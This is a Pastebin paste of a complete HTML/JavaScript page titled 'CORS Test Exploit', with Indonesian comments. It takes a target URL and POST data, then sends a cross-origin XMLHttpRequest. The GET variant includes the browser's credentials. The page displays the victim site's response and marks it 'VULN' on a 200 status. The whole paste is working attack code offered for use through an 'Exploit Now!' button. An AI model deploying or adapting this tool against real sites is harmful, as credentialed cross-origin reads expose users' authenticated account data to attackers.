daily pastebin goal
23%
SHARE
TWEET

Untitled

a guest Feb 20th, 2019 72 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.   <title>CORS Test Exploit</title>
  5.   <link rel="SHORTCUT ICON" href="https://issuetracker.google.com/img/favicon.ico">
  6.   <link rel="stylesheet" href="https://bootswatch.com/4/lumen/bootstrap.css" media="screen">
  7. </head>
  8. <body>
  9. <div class="container mt-4">
  10. <div class="col-md-6 border mx-auto p-4">
  11. <h3 class="text-center">CORS Test Exploit</h3>
  12. URL: <br/><input type="text" name="target" size="70" autocomplete="off"
  13. onkeypress="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  14. onkeyup   ="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  15. ><br/>
  16. Post Data: <br/><input type="text" name="postdata" size="70" autocomplete="off"
  17.   onkeypress="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  18.   onkeyup   ="if(this.value.match(/document/)) this.value=this.value.replace(/\D/g,'')"
  19. ><br/> <br/>
  20. <!-- Method GET / POST tinggal ganti onclick() -->
  21. <button type="button" class="btn btn-info" type="submit" onclick="post()">Exploit Now!</button>
  22. <pre id="result"></pre>
  23. <script type="text/javascript">
  24.     function get() {
  25.       var url   = document.getElementsByName("target")[0].value;
  26.         var xhttp = new XMLHttpRequest();
  27.         xhttp.onreadystatechange = function() {
  28.         if (this.readyState == 4 && this.status == 200) {
  29.               document.getElementById("result").innerHTML = '<br/><br/><pre>URL: '+url+'<br/>Response (Status : <kbd>VULN</kbd> | status code : <kbd>'+this.status+'</kbd>:<br><br><textarea style="margin: 0px; width: 411px; height: 436px;"">'+this.responseText+'</textarea></pre>'
  30.         }else{
  31.             document.getElementById("result").innerHTML = "<br/><br/><pre>URL: "+url+"<br/>Response (status : <kbd>Not Vuln</kbd>) : response tidak ada , status code <kbd>"+this.status+"</kbd></pre>";
  32.         }
  33.         };
  34.       xhttp.open("GET", url, true);
  35.       xhttp.withCredentials = true;
  36.       xhttp.send();
  37.     }
  38.   function post() {
  39.     var url   = document.getElementsByName("target")[0].value;
  40.     var data   = document.getElementsByName("postdata")[0].value;
  41.     var xhttp = new XMLHttpRequest();
  42.         xhttp.onreadystatechange = function() {
  43.         if (this.readyState == 4 && this.status == 200) {
  44.               document.getElementById("result").innerHTML = '<br/><br/><pre>URL: '+url+'<br/>Response (Status : <kbd>VULN</kbd> | status code : <kbd>'+this.status+'</kbd>):<br><br><textarea style="margin: 0px; width: 411px; height: 436px;"">'+this.responseText+'</textarea></pre>'
  45.         }else{
  46.             document.getElementById("result").innerHTML = "<br/><br/><pre>URL: "+url+"<br/>Respons (status : <kbd>Not Vuln</kbd>) : response tidak ada , status code <kbd>"+this.status+"</kbd></pre>";
  47.         }
  48.         };
  49.       xhttp.open("POST", url, true);
  50.       xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  51.       xhttp.send(data);
  52.   }
  53. </script>
  54. </div>
  55. </div>
  56. </body>
  57. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top